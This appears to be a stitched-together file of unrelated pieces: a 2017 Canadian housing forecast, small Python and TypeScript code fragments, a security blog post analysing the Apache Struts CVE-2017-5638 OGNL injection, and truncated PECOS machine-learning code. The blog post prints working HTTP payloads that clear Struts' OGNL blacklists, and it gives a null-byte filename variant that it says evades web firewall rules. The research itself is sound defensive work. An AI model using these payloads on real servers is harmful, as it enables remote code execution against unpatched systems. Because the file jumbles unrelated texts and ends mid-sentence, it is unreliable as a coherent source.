Okanagan, Kelowna’s real estate market is predicted to somewhat soften in 2017. “We’re still going to see a strong market,” Elton Ash, Regional Executive Vice President of RE/MAX Western Canada told Global News Monday. “We’re predicting a 4 per cent price increase on average in Kelowna and overall sales will remain relatively strong as well.” Manitoba, Quebec and Atlantic Canada Manitoba’s economy is expanding and the province is expected to see low single-digit house appreciation in 2017. Quebec’s economy is expected to grow in 2017, along with the price of its homes, at least in major centres. Newfoundland and Labrador is likely to see much of the same in 2017: further home price declines along with the economy. However, its regional neighbours will see growth. “New Brunswick, Nova Scotia and Prince Edward Island are expected to achieve economic growth in the coming year, along with continued residential housing market gains,” Royal LePage forecasted.
def paragraph_span(span, text): i, j = span[0], span[1] start = rfind_pattern(r'\n(?:\n|==)', text, 0, i) if start == -1: start = 0 elif text[start+1] == '\n': start += 2 else: start = re.compile(r'\n').search(text, start+3).end() end = index_pattern(r'\n(?:\n|==)', text, j) return (start, end)
Monday, March 27, 2017 at 12:10PM At GDS, we’ve had a busy few weeks helping our clients manage the risk associated with CVE-2017-5638 (S2-045), a recently published Apache Struts server-side template injection vulnerability. As we began this work, I found myself curious about the conditions that lead to this vulnerability in the Struts library code. We often hear about the exploitation of these types of vulnerabilities, but less about the vulnerable code that leads to them. This post is the culmination of research I have done into this very topic. What I present here is a detailed code analysis of the vulnerability, as well as payloads seen in the wild and a discussion on why some work while others don’t. I also present a working payload for S2-046, an alternate exploit vector that is capable of bypassing web application firewall rules that only examine request content types. I conclude with a couple of takeaways I had from this research. For those unfamiliar with the concept of SSTI (server-side template injection), it’s a classic example of an injection attack. A template engine parses what is intended to be template code, but somewhere along the way ends up parsing user input. The result is typically code execution in whatever form the template engine allows. For many popular template engines, such as Freemarker, Smarty, Velocity, Jade, and others, remote code execution outside of the engine is often possible (i.e. spawning a system shell). For cases like Struts, simple templating functionality is provided using an expression language such as Object-Graph Navigation Language (OGNL). As is the case for OGNL, it is often possible to obtain remote code execution outside of an expression engine as well. Many of these libraries do offer mechanisms to help mitigate remote code execution, such as sandboxing, but they tend to be disabled by default or trivial to bypass. From a code perspective, the simplest condition for SSTI to exist in an application is to have user input passed into a function that parses template code. Losing track of what functions handle values tainted with user input is an easy way to accidentally introduce all kinds of injection vulnerabilities into an application. To uncover a vulnerability like this, the call stack and any tainted data flow must be carefully traced and analyzed. This was the case to fully understand how CVE-2017-5638 works. The official CVE description reads: The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 mishandles file upload, which allows remote attackers to execute arbitrary commands via a #cmd= string in a crafted Content-Type HTTP header, as exploited in the wild in March 2017. This left me with the impression that the vulnerable code existed in the Jakarta Multipart parser and that it was triggered by a “#cmd=” string in the Content-Type HTTP header. Using Struts 2.5.10 as an example, we’ll soon learn that the issue is far more nuanced than that. To truly grasp how the vulnerability works, I needed to do a full analysis of relevant code in the library. Beginning With A Tainted Exception Message An exception thrown, caught, and logged when this vulnerability is exploited reveals a lot about how this vulnerability works. As we can see in the following reproduction, which results in remote code execution, an exception is thrown and logged in the parseRequest method in the Apache commons upload library. This is because the content-type of the request didn’t match an expected valid string. We also notice that the exception message thrown by this library includes the invalid content-type header supplied in the HTTP request. This in effect taints the exception message with user input. HTTP/1.1 200 OK Set-Cookie: JSESSIONID=16cuhw2qmanji1axbayhcp10kn;Path=/struts2-showcase Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Jetty(8.1.16.v20140903) Content-Length: 11 testwebuser The caller responsible for invoking the parseRequest method that generates the exception is in a class named JakartaMultiPartRequest. This class acts as a wrapper around the Apache commons fileupload library, defining a method named processUpload that calls its own version of the parseRequest method on line 91. This method creates a new ServletFileUpload object on line 151 and calls its parseRequest method on line 147. core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java: 90 : protected void processUpload ( HttpServletRequest request , String saveDir ) throws FileUploadException , UnsupportedEncodingException { 91 : for ( FileItem item : parseRequest ( request , saveDir ) ) { 92 : LOG . debug ( " Found file item: [{}] " , item . getFieldName ( ) ) ; 93 : if ( item . isFormField ( ) ) { 94 : processNormalFormField ( item , request . getCharacterEncoding ( ) ) ; 95 : } else { 96 : processFileField ( item ) ; 97 : } 98 : } 99 : } [ . . snip . . ] 144 : protected List < FileItem > parseRequest ( HttpServletRequest servletRequest , String saveDir ) throws FileUploadException { 145 : DiskFileItemFactory fac = createDiskFileItemFactory ( saveDir ) ; 146 : ServletFileUpload upload = createServletFileUpload ( fac ) ; 147 : return upload . parseRequest ( createRequestContext ( servletRequest ) ) ; 148 : } 149 : 150 : protected ServletFileUpload createServletFileUpload ( DiskFileItemFactory fac ) { 151 : ServletFileUpload upload = new ServletFileUpload ( fac ) ; 152 : upload . setSizeMax ( maxSize ) ; 153 : return upload ; 154 : } Looking at the stacktrace, we can see that the processUpload method is called by JakartaMultiPartRequest’s parse method on line 67. Any thrown exceptions from calling this method are caught on line 68 and passed to the method buildErrorMessage. Several paths exist for calling this method depending on the class of the exception thrown, but the result is always that this method is called. In this case the buildErrorMessage method is called on line 75. core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java: 64 : public void parse ( HttpServletRequest request , String saveDir ) throws IOException { 65 : try { 66 : setLocale ( request ) ; 67 : processUpload ( request , saveDir ) ; 68 : } catch ( FileUploadException e ) { 69 : LOG . warn ( " Request exceeded size limit! " , e ) ; 70 : LocalizedMessage errorMessage ; 71 : if ( e instanceof FileUploadBase . SizeLimitExceededException ) { 72 : FileUploadBase . SizeLimitExceededException ex = ( FileUploadBase . SizeLimitExceededException ) e ; 73 : errorMessage = buildErrorMessage ( e , new Object [ ] { ex . getPermittedSize ( ) , ex . getActualSize ( ) } ) ; 74 : } else { 75 : errorMessage = buildErrorMessage ( e , new Object [ ] { } ) ; 76 : } 77 : 78 : if ( ! errors . contains ( errorMessage ) ) { 79 : errors . add ( errorMessage ) ; 80 : } 81 : } catch ( Exception e ) { 82 : LOG . warn ( " Unable to parse request " , e ) ; 83 : LocalizedMessage errorMessage = buildErrorMessage ( e , new Object [ ] { } ) ; 84 : if ( ! errors . contains ( errorMessage ) ) { 85 : errors . add ( errorMessage ) ; 86 : } 87 : } 88 : } Since the JakartaMultiPartRequest class doesn’t define the buildErrorMessage method, we look to the class that it extends which does: AbstractMultiPartRequest. core/src/main/java/org/apache/struts2/dispatcher/multipart/AbstractMultiPartRequest.java: 98 : protected LocalizedMessage buildErrorMessage ( Throwable e , Object [ ] args ) { 99 : String errorKey = " struts.messages.upload.error. " + e . getClass ( ) . getSimpleName ( ) ; 100 : LOG . debug ( " Preparing error message for key: [{}] " , errorKey ) ; 101 : 102 : return new LocalizedMessage ( this . getClass ( ) , errorKey , e . getMessage ( ) , args ) ; 103 : } The LocalizedMessage that it returns defines a simple container-like object. The important details here are: The instance’s textKey is set to a struts.messages.upload.error.InvalidContentTypeException. The instance’s defaultMessage is set to the exception message tainted with user input. Next in the stacktrace, we can see that JakartaMultiPartRequest’s parse method is invoked in MultiPartRequestWrapper’s constructor method on line 86. The addError method called on line 88 checks to see if the error has already been seen, and if not it adds it to an instance variable that holds a collection of LocalizedMessage objects. core/src/main/java/org/apache/struts2/dispatcher/multipart/MultiPartRequestWrapper.java: 77 : public MultiPartRequestWrapper ( MultiPartRequest multiPartRequest , HttpServletRequest request , 78 : String saveDir , LocaleProvider provider , 79 : boolean disableRequestAttributeValueStackLookup ) { 80 : super ( request , disableRequestAttributeValueStackLookup ) ; [ . . snip . . ] 85 : try { 86 : multi . parse ( request , saveDir ) ; 87 : for ( LocalizedMessage error : multi . getErrors ( ) ) { 88 : addError ( error ) ; 89 : } On the next line of our stacktrace, we see that the Dispatcher class is responsible for instantiating a new MultiPartRequestWrapper object and calling the constructor method above. The method called here is named wrapRequest and is responsible for detecting if the request’s content type contains the substring “multipart/form-data” on line 801. If it does, a new MultiPartRequestWrapper is created on line 804 and returned. core/src/main/java/org/apache/struts2/dispatcher/Dispatcher.java: 794 : public HttpServletRequest wrapRequest ( HttpServletRequest request ) throws IOException { 795 : // don't wrap more than once 796 : if ( request instanceof StrutsRequestWrapper ) { 797 : return request ; 798 : } 799 : 800 : String content_type = request . getContentType ( ) ; 801 : if ( content_type ! = null & & content_type . contains ( " multipart/form-data " ) ) { 802 : MultiPartRequest mpr = getMultiPartRequest ( ) ; 803 : LocaleProvider provider = getContainer ( ) . getInstance ( LocaleProvider . class ) ; 804 : request = new MultiPartRequestWrapper ( mpr , request , getSaveDir ( ) , provider , disableRequestAttributeValueStackLookup ) ; 805 : } else { 806 : request = new StrutsRequestWrapper ( request , disableRequestAttributeValueStackLookup ) ; 807 : } 808 : 809 : return request ; 810 : } At this point in our analysis, our HTTP request has been parsed and our wrapped request object (MultiPartRequestWrapper) holds an error (LocalizedMessage) with our tainted default message and a textKey set to struts.messages.upload.error.InvalidContentTypeException. Calling Struts’ File Upload Interceptor The rest of the stacktrace doesn’t provide anything terribly useful to us to continue tracing data flow. However, we have a clue for where to look next. Struts processes requests through a series of interceptors. As it turns out, an interceptor named FileUploadInterceptor is part of the default “stack” that Struts is configured to use. As we can see on line 242, the interceptor checks to see if our request object is an instance of the class MultiPartRequestWrapper. We know that it is because the Dispatcher previously returned an instance of this class. The interceptor continues to check if the MultiPartRequestWrapper object has any errors on line 261, which we already know it does. It then calls LocalizedTextUtil’s findText method on line 264, passing in several arguments such as the error’s textKey and our tainted defaultMessage. core/src/main/java/org/apache/struts2/interceptor/FileUploadInterceptor.java: 237 : public String intercept ( ActionInvocation invocation ) throws Exception { 238 : ActionContext ac = invocation . getInvocationContext ( ) ; 239 : 240 : HttpServletRequest request = ( HttpServletRequest ) ac . get ( ServletActionContext . HTTP_REQUEST ) ; 241 : 242 : if ( ! ( request instanceof MultiPartRequestWrapper ) ) { 243 : if ( LOG . isDebugEnabled ( ) ) { 244 : ActionProxy proxy = invocation . getProxy ( ) ; 245 : LOG . debug ( getTextMessage ( " struts.messages.bypass.request " , new String [ ] { proxy . getNamespace ( ) , proxy . getActionName ( ) } ) ) ; 246 : } 247 : 248 : return invocation . invoke ( ) ; 249 : } 250 : [ . . snip . . ] 259 : MultiPartRequestWrapper multiWrapper = ( MultiPartRequestWrapper ) request ; 260 : 261 : if ( multiWrapper . hasErrors ( ) ) { 262 : for ( LocalizedMessage error : multiWrapper . getErrors ( ) ) { 263 : if ( validation ! = null ) { 264 : validation . addActionError ( LocalizedTextUtil . findText ( error . getClazz ( ) , error . getTextKey ( ) , ActionContext . getContext ( ) . getLocale ( ) , error . getDefaultMessage ( ) , error . getArgs ( ) ) ) ; 265 : } 266 : } 267 : } Following Localized Text This is where things start to get interesting. A version of the LocalizedTextUtil’s method findText is called that tries to find an error message to return based on several factors. I have omitted the large method definition because the comment below accurately describes it. The findText method call is invoked where: aClassName is set to AbstractMultiPartRequest. aTextName is set to the error’s textKey, which is struts.messages.upload.error.InvalidContentTypeException. Locale is set to the ActionContext’s locale. defaultMessage is our tainted exception message as a string. Args is an empty array. valueStack is set to the ActionContext’s valueStack. 397 : /** 398 : * <p> 399 : * Finds a localized text message for the given key, aTextName. Both the key and the message 400 : * itself is evaluated as required. The following algorithm is used to find the requested 401 : * message : 402 : * </p> 403 : * 404 : * <ol> 405 : * <li>Look for message in aClass' class hierarchy. 406 : * <ol> 407 : * <li>Look for the message in a resource bundle for aClass</li> 408 : * <li>If not found, look for the message in a resource bundle for any implemented interface</li> 409 : * <li>If not found, traverse up the Class' hierarchy and repeat from the first sub-step</li> 410 : * </ol></li> 411 : * <li>If not found and aClass is a {@link ModelDriven} Action, then look for message in 412 : * the model's class hierarchy (repeat sub-steps listed above).</li> 413 : * <li>If not found, look for message in child property. This is determined by evaluating 414 : * the message key as an OGNL expression. For example, if the key is 415 : * <i>user.address.state</i>, then it will attempt to see if "user" can be resolved into an 416 : * object. If so, repeat the entire process fromthe beginning with the object's class as 417 : * aClass and "address.state" as the message key.</li> 418 : * <li>If not found, look for the message in aClass' package hierarchy.</li> 419 : * <li>If still not found, look for the message in the default resource bundles.</li> 420 : * <li>Return defaultMessage</li> 421 : * </ol> Because a resource bundle is not found defining an error message for struts.messages.upload.error.InvalidContentTypeException, this process ends up invoking the method getDefaultMessage on line 573: core/src/main/java/com/opensymphony/xwork2/util/LocalizedTextUtil.java: 570 : // get default 571 : GetDefaultMessageReturnArg result ; 572 : if ( indexedTextName = = null ) { 573 : result = getDefaultMessage ( aTextName , locale , valueStack , args , defaultMessage ) ; 574 : } else { 575 : result = getDefaultMessage ( aTextName , locale , valueStack , args , null ) ; 576 : if ( result ! = null & amp ; & amp ; result . message ! = null ) { 577 : return result . message ; 578 : } 579 : result = getDefaultMessage ( indexedTextName , locale , valueStack , args , defaultMessage ) ; 580 : } The getDefaultMessage method in the same class is responsible making one last ditch effort of trying to find a suitable error message given a key and a locale. In our case, it still fails and takes our tainted exception message and calls TextParseUtil’s translateVariables method on line 729. core/src/main/java/com/opensymphony/xwork2/util/LocalizedTextUtil.java: 714 : private static GetDefaultMessageReturnArg getDefaultMessage ( String key , Locale locale , ValueStack valueStack , Object [ ] args , 715 : String defaultMessage ) { 716 : GetDefaultMessageReturnArg result = null ; 717 : boolean found = true ; 718 : 719 : if ( key ! = null ) { 720 : String message = findDefaultText ( key , locale ) ; 721 : 722 : if ( message = = null ) { 723 : message = defaultMessage ; 724 : found = false ; // not found in bundles 725 : } 726 : 727 : // defaultMessage may be null 728 : if ( message ! = null ) { 729 : MessageFormat mf = buildMessageFormat ( TextParseUtil . translateVariables ( message , valueStack ) , locale ) ; 730 : 731 : String msg = formatWithNullDetection ( mf , args ) ; 732 : result = new GetDefaultMessageReturnArg ( msg , found ) ; 733 : } 734 : } 735 : 736 : return result ; 737 : } An OGNL Expression Data Sink As it turns out, TextParseUtil’s translateVariables method is a data sink for expression language evaluation. Just as the method’s comment explains, it provides simple template functionality by evaluating OGNL expressions wrapped in instances of ${…} and %{…}. Several versions of the translateVariables method are defined and called, with the last evaluating the expression on line 166. core/src/main/java/com/opensymphony/xwork2/util/TextParseUtil.java: 34 : /** 35 : * Converts all instances of ${...}, and %{...} in <code>expression</code> to the value returned 36 : * by a call to {@link ValueStack#findValue(java.lang.String)}. If an item cannot 37 : * be found on the stack (null is returned), then the entire variable ${...} is not 38 : * displayed, just as if the item was on the stack but returned an empty string. 39 : * 40 : * @param expression an expression that hasn't yet been translated 41 : * @param stack value stack 42 : * @return the parsed expression 43 : */ 44 : public static String translateVariables ( String expression , ValueStack stack ) { 45 : return translateVariables ( new char [ ] { '$' , '%' } , expression , stack , String . class , null ) . toString ( ) ; 46 : } [ . . snip . . ] 152 : public static Object translateVariables ( char [ ] openChars , String expression , final ValueStack stack , final Class asType , final ParsedValueEvaluator evaluator , int maxLoopCount ) { 153 : 154 : ParsedValueEvaluator ognlEval = new ParsedValueEvaluator ( ) { 155 : public Object evaluate ( String parsedValue ) { 156 : Object o = stack . findValue ( parsedValue , asType ) ; 157 : if ( evaluator ! = null & & o ! = null ) { 158 : o = evaluator . evaluate ( o . toString ( ) ) ; 159 : } 160 : return o ; 161 : } 162 : } ; 163 : 164 : TextParser parser = ( ( Container ) stack . getContext ( ) . get ( ActionContext . CONTAINER ) ) . getInstance ( TextParser . class ) ; 165 : 166 : return parser . evaluate ( openChars , expression , ognlEval , maxLoopCount ) ; 167 : } With this last method call, we have traced an exception message tainted with user input all the way to the evaluation of OGNL. Payload Analysis A curious reader might be wondering how the exploit’s payload works. To start, let us first attempt to supply a simple OGNL payload that returns an additional header. We need to include the unused variable in the beginning, so that Dispatcher’s check for a “multipart/form-data” substring passes and our request gets parsed as a file upload. POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: ${(#_='multipart/form-data').(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))} Content-Length: 0 HTTP/1.1 200 OK Set-Cookie: JSESSIONID=1wq4m7r2pkjqfak2zaj4e12kn;Path=/struts2-showcase Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html [..snip..] Huh? It didn’t work. A look at our logs shows a warning was logged: 17-03-24 12:48:30,904 WARN [qtp18233895-25] ognl.SecurityMemberAccess (SecurityMemberAccess.java:74) - Package of target [[email protected]2] or package of member [public void javax.servlet.http.HttpServletResponseWrapper.addHeader(java.lang.String,java.lang.String)] are excluded! As it turns out, Struts offers blacklisting functionality for class member access (i.e. class methods). By default, the following class lists and regular expressions are used: core/src/main/resources/struts-default.xml: 41 : < constant name = " struts.excludedClasses " 42 : value = " 43 : java.lang.Object, 44 : java.lang.Runtime, 45 : java.lang.System, 46 : java.lang.Class, 47 : java.lang.ClassLoader, 48 : java.lang.Shutdown, 49 : java.lang.ProcessBuilder, 50 : ognl.OgnlContext, 51 : ognl.ClassResolver, 52 : ognl.TypeConverter, 53 : ognl.MemberAccess, 54 : ognl.DefaultMemberAccess, 55 : com.opensymphony.xwork2.ognl.SecurityMemberAccess, 56 : com.opensymphony.xwork2.ActionContext " > 57 : [ . . snip . . ] 63 : < constant name = " struts.excludedPackageNames " value = " java.lang.,ognl,javax,freemarker.core,freemarker.template " > To better understand the original OGNL payload, let us try a simplified version that actually works: POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: ${(#_='multipart/form-data').(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}} Content-Length: 0 HTTP/1.1 200 OK Set-Cookie: JSESSIONID=avmifel7x66q9cmnsrr8lq0s;Path=/struts2-showcase Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Struts-Exploit-Test: GDSTEST Content-Type: text/html [..snip..] As we can see, this one does indeed work. But how is it bypassing the blacklisting we saw earlier? What this payload does is empty the list of excluded package names and classes, thereby rendering the blacklist useless. It does this by first fetching the current container associated with the OGNL context and assigning it to the “container” variable. You may notice that the class com.opensymphony.xwork2.ActionContext is included in the blacklist above. How is this possible then? The blacklist doesn’t catch it because we aren’t referencing a class member, but rather by a key that already exists in the OGNL Value Stack (defined in core/src/main/java/com/opensymphony/xwork2/ActionContext.java:102). The reference to an instance of this class is already made for us, and the payload takes advantage of this. Next, the payload gets the container’s instance of OgnlUtil, which allows us to invoke methods that return the current excluded classes and package names. The final step is to simply get and clear each blacklist and execute whatever unrestricted evaluations we want. An interesting point to make here is that once the blacklists have been emptied, they remain empty until overwritten by code or until the application has been restarted. I found this to be a common pitfall when attempting to reproduce certain payloads found in the wild or documented in other research. Some payloads failed to work because they assumed the blacklists had already been emptied, which would have likely occurred during the testing of different payloads earlier on. This emphasizes the importance of resetting application state when running dynamic tests. You may have also noticed that the original exploit’s payload used is a bit more complicated than the one presented here. Why does it perform extra steps such as checking a _memberAccess variable and calling a method named setMemberAccess? It may be an attempt to leverage another technique to clear each blacklist, just in case the first technique didn’t work. The setMemberAccess method is called with a default instance of the MemberAcess class, which in effect clears each blacklist too. I could confirm that this technique works in Struts 2.3.31 but not 2.5.10. I am still unsure, however, of what the purpose is of the ternary operator that checks for and conditionally assigns _memberAccess. During testing I did not observe this variable to evaluate as true. Other Exploit Vectors Other exploit vectors exist for this vulnerability as of 2.5.10. This is due to the fact that any exception message tainted with user input that doesn’t have an associated error key will be evaluated as OGNL. For example, supplying an upload filename with a null byte will cause an InvalidFileNameException exception to be thrown from the Apache commons fileupload library. This would also bypass a web application firewall rule examining the content-type header. The %00 in the request below should be URL decoded first. The result is an exception message that is tainted with user input. POST /struts2-showcase/ HTTP/1.1 Host: localhost:8080 Content-Type: multipart/form-data; boundary=---------------------------1313189278108275512788994811 Content-Length: 570 -----------------------------1313189278108275512788994811 Content-Disposition: form-data; name="upload"; filename="a%00${(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}” Content-Type: text/html test -----------------------------1313189278108275512788994811-- HTTP/1.1 404 No result defined for action com.opensymphony.xwork2.ActionSupport and result input Set-Cookie: JSESSIONID=hu1m7hcdnixr1h14hn51vyzhy;Path=/struts2-showcase X-Struts-Exploit-Test: GDSTEST Content-Type: text/html;charset=ISO-8859-1 [..snip..] 2017-03-24 15:21:29,729 WARN [qtp1168849885-26] multipart.JakartaMultiPartRequest (JakartaMultiPartRequest.java:82) - Unable to parse request org.apache.commons.fileupload.InvalidFileNameException: Invalid file name: a\0${(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))} at org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:189) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:259) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processFileField(JakartaMultiPartRequest.java:105) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:96) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:67) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper. (MultiPartRequestWrapper.java:86) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:806) [struts2-core-2.5.10.jar:2.5.10] As you can see by looking at the stacktrace, control flow diverges in the processUpload method of the JakartaMultiPartRequest class. Instead of an exception being thrown when calling the parseRequest method on line 91, an exception is thrown when calling the processFileField method and getting the name of a file item on line 105. core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java: 90 : protected void processUpload ( HttpServletRequest request , String saveDir ) throws FileUploadException , UnsupportedEncodingException { 91 : for ( FileItem item : parseRequest ( request , saveDir ) ) { 92 : LOG . debug ( " Found file item: [{}] " , item . getFieldName ( ) ) ; 93 : if ( item . isFormField ( ) ) { 94 : processNormalFormField ( item , request . getCharacterEncoding ( ) ) ; 95 : } else { 96 : processFileField ( item ) ; 97 : } 98 : } 99 : } [ . . snip . . ] 101 : protected void processFileField ( FileItem item ) { 102 : LOG . debug ( " Item is a file upload " ) ; 103 : 104 : // Skip file uploads that don't have a file name - meaning that no file was selected. 105 : if ( item . getName ( ) = = null | | item . getName ( ) . trim ( ) . length ( ) < 1 ) { 106 : LOG . debug ( " No file has been uploaded for the field: {} " , item . getFieldName ( ) ) ; 107 : return ; 108 : } 109 : 110 : List < FileItem > values ; 111 : if ( files . get ( item . getFieldName ( ) ) ! = null ) { 112 : values = files . get ( item . getFieldName ( ) ) ; 113 : } else { 114 : values = new ArrayList < > ( ) ; 115 : } 116 : 117 : values . add ( item ) ; 118 : files . put ( item . getFieldName ( ) , values ) ; 119 : } Takeaways One takeaway I had from this research is that you can’t always rely on reading CVE descriptions to understand how a vulnerability works. The reason this vulnerability was ever possible was because the file upload interceptor attempted to resolve error messages using a potentially dangerous function that evaluates OGNL. The elimination of this possibility is what lead to a successful patching of this vulnerability. Therefore this is not a problem with the Jakarta request wrapper, as the CVE description implies, but with the file upload interceptor trusting that exception messages will be free of user input. Another takeaway I had reinforced the idea that you can’t rely on using known attack signatures to block exploitation at the web application firewall level. For example, if a web application firewall were configured to look for OGNL in the content-type header, it would miss the additional attack vector explained in this post. The only reliable way to eliminate vulnerabilities like this one is to apply available patches, either manually or by installing updates.
import ClipChannel from './clip_channel_model'; async function add(channelId: string, channelName: string): Promise<void> { await new ClipChannel({ channelId, channelName }).save(); } async function remove(channelId: string): Promise<void> { await ClipChannel.findOneAndRemove({ channelId }); } async function has(channelId: string): Promise<boolean> { return Boolean(await ClipChannel.findOne({ channelId })); } export default { add, remove, has, };
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance # with the License. A copy of the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions # and limitations under the License. import copy import json import logging import multiprocessing as mp import os import tempfile import time import dataclasses as dc import numpy as np import pecos import scipy.sparse as smat import torch import transformers from pecos.core import clib from pecos.utils import parallel_util, smat_util, torch_util from pecos.xmc import MLModel, MLProblem, PostProcessor from sklearn.preprocessing import normalize as sk_normalize from torch.nn.utils.rnn import pad_sequence from torch.utils.data import DataLoader, RandomSampler, SequentialSampler from transformers import AdamW, AutoConfig, get_scheduler from .module import XMCDataset from .network import ENCODER_CLASSES, HingeLoss, TransformerLinearXMCHead logging.getLogger(transformers.__name__).setLevel(logging.WARNING) LOGGER = logging.getLogger(__name__) class TransformerMatcher(pecos.BaseClass): """Transformer Matcher Model Construct, fine-tune the transformers and predict on a fixed output label space. """ LOSS_FUNCTION_TYPES = { "hinge": HingeLoss(margin=1.0, power=1), "squared-hinge": HingeLoss(margin=1.0, power=2), "weighted-hinge": HingeLoss(margin=1.0, power=1, cost_weighted=True), "weighted-squared-hinge": HingeLoss(margin=1.0, power=2, cost_weighted=True), "cross-entropy": torch.nn.BCEWithLogitsLoss(reduction="sum"), } @dc.dataclass class TrainParams(pecos.BaseParams): # type: ignore """Training Parameters of MLModel model_shortcut (str): string of pre-trained model shortcut. Default 'bert-base-cased' negative_sampling (str): negative sampling types. Default tfn loss_function (str): type of loss function to use for transformer training. Default 'squared-hinge' bootstrap_method (str): algorithm to bootstrap text_model. If not None, initialize TransformerMatcher projection layer with one of: 'linear' (default): linear model trained on final embeddings of parent layer 'inherit': inherit weights from parent labels lr_schedule (str): learning rate schedule. See transformers.SchedulerType for details. Default 'linear' threshold (float): threshold to sparsify the model weights. Default 0.1 hidden_dropout_prob (float): hidden dropout prob in deep transformer models. Default 0.1 batch_size (int): batch size for transformer training. Default 8 batch_gen_workers (int): number of workers for batch generation. Default 4 max_active_matching_labels (int): max number of active matching labels, will sub-sample from existing negative samples if necessary. Default None to ignore max_num_labels_in_gpu (int): Upper limit on labels to put output layer in GPU. Default 65536. max_steps (int): if > 0: set total number of training steps to perform. Override num-train-epochs. Default -1. max_no_improve_cnt (int): if > 0, training will stop when this number of validation steps result in no improvement. Default -1. num_train_epochs (int): total number of training epochs to perform. Default 5 gradient_accumulation_steps (int): number of updates steps to accumulate before performing a backward/update pass. Default 1. weight_decay (float): weight decay rate for regularization. Default 0 to ignore max_grad_norm (float): max gradient norm used for gradient clipping. Default 1.0 learning_rate (float): maximum learning rate for Adam. Default 5e-5 adam_epsilon (float): epsilon for Adam optimizer.Default 1e-8 warmup_steps (float): learning rate warmup over warmup-steps. Default 0 logging_steps (int): log training information every NUM updates steps. Default 50 save_steps (int): save checkpoint every NUM updates steps. Default 100 no_fine_tune (bool, optional): not to do fine-tuning on the transformer text_encoder. Default False disable_gpu (bool, optional): not to use GPU even if available. Default False model_dir (str): path to save training checkpoints. Default empty to use a temp dir. cache_dir (str): dir to store the pre-trained models downloaded from s3. Default empty to use a temp dir. init_model_dir (str): path to load checkpoint of TransformerMatcher. If given, start from the given checkpoint rather than downloading a pre-trained model from S3. Default empty to ignore saved_trn_pt: (str): dir to save/load tokenized train tensors. Default empty to ignore saved_val_pt: (str): dir to save/load tokenized validation tensors. Default empty to ignore save_emb_dir (str): dir to save instance embeddings. Default empty to ignore """ model_shortcut: str = "bert-base-cased" negative_sampling: str = "tfn" loss_function: str = "squared-hinge" bootstrap_method: str = "linear" lr_schedule: str = "linear" threshold: float = 0.1 hidden_dropout_prob: float = 0.1 batch_size: int = 8 batch_gen_workers: int = 4 max_active_matching_labels: int = None # type: ignore max_num_labels_in_gpu: int = 65536 max_steps: int = 0 max_no_improve_cnt: int = -1 num_train_epochs: int = 5 gradient_accumulation_steps: int = 1 weight_decay: float = 0 max_grad_norm: float = 1.0 learning_rate: float = 5e-5 adam_epsilon: float = 1e-8 warmup_steps: int = 0 logging_steps: int = 50 save_steps: int = 100 no_fine_tune: bool = False disable_gpu: bool = False model_dir: str = "" cache_dir: str = "" init_model_dir: str = "" saved_trn_pt: str = "" saved_val_pt: str = "" save_emb_dir: bool = False @dc.dataclass class PredParams(pecos.BaseParams): # type: ignore """Prediction Parameters of MLModel only_topk (int, optional): the only topk specified in the model. Default to 20 post_processor (str, optional): the post_processor specified in the model. Default to "noop" ensemble_method (str, optional): micro ensemble method to generate prediction. Default to "transformer-only". See TransformerMatcher.ensemble_prediction for details. truncate_length (int, 